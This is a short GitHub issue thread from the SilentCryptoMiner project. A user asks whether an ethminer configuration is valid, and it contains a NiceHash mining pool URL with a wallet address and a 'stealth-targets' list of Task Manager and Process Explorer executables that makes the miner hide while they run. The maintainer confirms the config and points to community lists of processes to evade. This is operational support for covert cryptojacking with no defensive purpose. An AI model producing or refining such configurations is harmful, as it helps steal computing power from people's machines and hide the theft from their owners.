### ISSUE TITLE
Is this ethminer config valid?

### ISSUE THREAD

**Issue by wnetMC** [UnamSanctam/SilentCryptoMiner#1320]
```

{
	"url": "stratums://`NHbCmEVwLxACWFkHYc2dTmSSJ8bKq1SsSUSc`@etchash.auto.nicehash.com:443",
	"algo": "etchash",
	"max-gpu": 10,
	"idle-wait": 5,
	"idle-gpu": 100,
  "api-endpoint": "",
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
}

```
Should I get rid of the `` surrounding the address in this line?
```

"url": "stratums://`NHbCmEVwLxACWFkHYc2dTmSSJ8bKq1SsSUSc`@etchash.auto.nicehash.com:443",
```

**Comment by UnamSanctam** [comment]
Yes that looks correct, You don't need to remove the ``, they are only there to make sure that everything within them gets encoded correctly.

**Comment by wnetMC** [comment]
okay, can you send me the link to where I can find community made lists of stealth proccesses and stuff

**Comment by UnamSanctam** [comment]
It's in the "Discussion" tab https://github.com/UnamSanctam/SilentCryptoMiner/discussions.
